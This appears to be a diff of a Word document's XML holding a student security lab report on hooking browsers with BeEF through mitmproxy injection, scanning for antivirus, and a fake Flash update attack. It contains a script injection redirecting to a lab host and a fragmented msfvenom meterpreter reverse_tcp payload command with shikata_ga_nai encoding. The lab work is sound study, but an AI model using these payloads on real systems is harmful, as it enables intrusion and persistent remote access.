+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>document.location</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="008800"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>="http://10.0.0.16:3000/demos/basic.html";&lt;/script&gt;&lt;/head&gt;'</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14260,7 +15788,25 @@
           <w:color w:val="000000"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>Now close all tabs and navigate to an HTTPS website (e.g </w:t>
+        <w:t>Now close all tabs and navigate to an HTTPS website (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>e.g</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t> </w:t>
       </w:r>
       <w:hyperlink r:id="rId23" w:history="1">
         <w:r>
@@ -14279,7 +15825,43 @@
           <w:color w:val="000000"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>). Go back to BeEF panel and check if the target browser is hooked. It should not be hooked. Now check the certificate of the website you are using. Is it the same as the produced certificate by mitmproxy? If not ensure that it is. Why isn’t the injection working?</w:t>
+        <w:t xml:space="preserve">). Go back to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>BeEF</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> panel and check if the target browser is hooked. It should not be hooked. Now check the certificate of the website you are using. Is it the same as the produced certificate by </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>mitmproxy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>? If not ensure that it is. Why isn’t the injection working?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14314,7 +15896,43 @@
           <w:color w:val="000000"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">of the website that we are using is the same as the produced certificate by the mitmproxy. The injection isn’t working because the mitmproxy certificate is not the same web server certificate </w:t>
+        <w:t xml:space="preserve">of the website that we are using is the same as the produced certificate by the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>mitmproxy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. The injection isn’t working because the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>mitmproxy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> certificate is not the same web server certificate </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14526,7 +16144,25 @@
           <w:color w:val="000000"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>Now visit an HTTP website (e.g </w:t>
+        <w:t>Now visit an HTTP website (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>e.g</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t> </w:t>
       </w:r>
       <w:hyperlink r:id="rId25" w:history="1">
         <w:r>
@@ -14545,7 +16181,43 @@
           <w:color w:val="000000"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>). In this case the injection should work and you should be able to see the web browser in BeEF’s </w:t>
+        <w:t xml:space="preserve">). In this case the injection should </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>work</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and you should be able to see the web browser in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>BeEF’s</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14607,63 +16279,119 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">The reason </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
-          <w:color w:val="000000"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">why </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
-          <w:color w:val="000000"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">this method is working is because of the protocol we are using </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
-          <w:color w:val="000000"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">– </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
-          <w:color w:val="000000"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>(HTTP)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
-          <w:color w:val="000000"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> – in this task</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
-          <w:color w:val="000000"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. The certificates that we mention in task 14 only apply to HTTPS. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
-          <w:color w:val="000000"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>HTTPS adds a layer of security known as Secure Socket Layer (SSL) or the Transport layer Security (SSL).  Both SSL and TLS rely on the notion a certificate to verify the identity of the server and establish an encrypted communication channel between the web browser and the web server.</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="19" w:name="_GoBack"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>This</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> method is working because we are using </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">an </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>HTTP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> request </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>in this task</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>. The certificates that mention</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ed </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">in task 14 only apply to HTTPS. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">HTTPS adds a layer of security known as Secure Socket Layer (SSL) or the Transport </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>L</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ayer Security (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>TLS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>).  Both SSL and TLS rely on a certificate to verify the identity of the server and establish an encrypted communication channel between the web browser and the web server.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14675,16 +16403,35 @@
           <w:u w:val="single"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="19" w:name="_Toc23700332"/>
+      <w:bookmarkStart w:id="20" w:name="_Toc23700332"/>
+      <w:bookmarkEnd w:id="19"/>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>Part 5: More BeEF:</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="19"/>
+        <w:t xml:space="preserve">Part 5: More </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>BeEF</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="20"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -14694,30 +16441,66 @@
           <w:u w:val="single"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="20" w:name="_Toc23700333"/>
+      <w:bookmarkStart w:id="21" w:name="_Toc23700333"/>
       <w:r>
         <w:rPr>
           <w:u w:val="single"/>
         </w:rPr>
         <w:t>Task 16:</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="20"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
-          <w:color w:val="000000"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
-          <w:color w:val="000000"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t> In BeEF you will find a command which scans for the antivirus in the target system. Report the result of the antivirus scan from BeEF framework and how to perform it. What is the antivirus that the target machine is using?</w:t>
+      <w:bookmarkEnd w:id="21"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> In </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>BeEF</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> you will find a command which scans for the antivirus in the target system. Report the result of the antivirus scan from </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>BeEF</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> framework and how to perform it. What is the antivirus that the target machine is using?</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -14731,7 +16514,49 @@
         <w:rPr>
           <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
         </w:rPr>
-        <w:t>Steps to perform antivirus scan in BeEF (assuming already in the BeEF ui panel):</w:t>
+        <w:t xml:space="preserve">Steps to perform antivirus scan in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
+        <w:t>BeEF</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (assuming already in the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
+        <w:t>BeEF</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
+        <w:t>ui</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> panel):</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15037,14 +16862,14 @@
           <w:u w:val="single"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="21" w:name="_Toc23700334"/>
+      <w:bookmarkStart w:id="22" w:name="_Toc23700334"/>
       <w:r>
         <w:rPr>
           <w:u w:val="single"/>
         </w:rPr>
         <w:t>Task 17:</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="21"/>
+      <w:bookmarkEnd w:id="22"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -15079,7 +16904,25 @@
           <w:color w:val="000000"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t> explain the steps and the exact commands that a potential attacker can use to gain access to the system and how he/she can make this attack persistent not to lose the access even after victim system reboot. Post screenshot of how it looks on the victim browser after executing the social engineering attack from BeEF.</w:t>
+        <w:t xml:space="preserve"> explain the steps and the exact commands that a potential attacker can use to gain access to the system and how he/she can make this attack persistent not to lose the access even after victim system reboot. Post screenshot of how it looks on the victim browser after executing the social engineering attack from </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>BeEF</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15116,7 +16959,43 @@
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:tab/>
-        <w:t xml:space="preserve">One method that the potential attacker can use in order to gain access to the system using the fake flash update social engineering method is by creating a payload using msfvenom that will give us a meterpreter session. This is assuming our victim’s computer is a windows system. </w:t>
+        <w:t xml:space="preserve">One method that the potential attacker can use in order to gain access to the system using the fake flash update social engineering method is by creating a payload using </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>msfvenom</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> that will give us a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>meterpreter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> session. This is assuming our victim’s computer is a windows system. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15205,23 +17084,45 @@
           <w:szCs w:val="20"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>root@kali</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="666600"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>:~#</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>root@</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>kali</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="666600"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>:~</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="666600"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>#</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15241,6 +17142,7 @@
         </w:rPr>
         <w:t>/</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -15250,6 +17152,7 @@
         </w:rPr>
         <w:t>usr</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -15277,14 +17180,25 @@
         </w:rPr>
         <w:t>/</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">msfvenom </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>msfvenom</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15313,6 +17227,7 @@
         </w:rPr>
         <w:t>/</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -15322,6 +17237,7 @@
         </w:rPr>
         <w:t>meterpreter</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -15331,14 +17247,25 @@
         </w:rPr>
         <w:t>/</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>reverse_tcp LPORT</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>reverse_tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> LPORT</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15457,14 +17384,25 @@
         </w:rPr>
         <w:t>/</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">shikata_ga_nai </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
